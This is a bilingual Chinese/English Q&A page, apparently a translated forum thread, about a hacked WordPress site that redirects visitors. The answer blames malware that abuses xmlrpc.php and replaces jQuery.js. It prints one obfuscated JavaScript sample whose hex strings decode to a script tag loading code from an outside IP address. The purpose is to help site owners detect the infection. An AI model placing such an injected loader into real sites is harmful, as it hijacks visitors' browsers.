Google 搜索后的页面重定向 - Wordpress 网站被黑 [英] page redirect after Google search - Wordpress site hacked

问题描述

我们有页面域..，当您在 google.nl 上搜索至 Critical Alignment 并单击该站点的主页时，几秒钟后您将被重定向到 http://www.venusfactor.com/welcome/.我们认为该网站已被黑，但找不到重定向或任何内容.

We have the page domain.., and when you search at google.nl to Critical Alignment and click at the homepage of the site you are redirected after a couple of seconds to http://www.venusfactor.com/welcome/. We think the site is hacked, but can not find a redirect or anything.

有人可以帮忙吗?

推荐答案

一种新病毒正在传播，它滥用 wordpress 的 xmlrpc.php 将自身注入服务器，并用自己受污染的副本替换 javascript 文件.

A new virus is spreading that is abusing the xmlrpc.php of wordpress to inject itself into the server and replace the javascript files with its own contaminated copies.

>

如果您看到太多来自可疑 IP 地址的 xmlrpc 请求 POST 请求，如下所示，请验证您的 javascript 文件的完整性.

If you see too many xmlrpc requests POST requests from a suspicious ip-address, such as the below, verify the integrity of your javascript files.

$text = 'var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))

该病毒的一个关键特征是，它主要针对 jQuery.js，用自己的版本替换它(当用户浏览到您的网站时，会自动将他们重定向到点击诱饵文章).

One key feature of this virus is, it primarily targets the jQuery.js, replacing it with its own version (that when users browsers to your site, automatically redirects them to clickbait articles).

它通过首先发布一个新的 php 文件来实现这一点，例如 recure.php 通常包含混淆的 php 代码，或者将 wordpress 插件上传到上传文件夹.

It achieves this by first posting a new php files, such as recure.php which usually contain obfuscated php code, or uploading wordpress plugins to the upload folder.

这篇关于Google 搜索后的页面重定向 - Wordpress 网站被黑的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！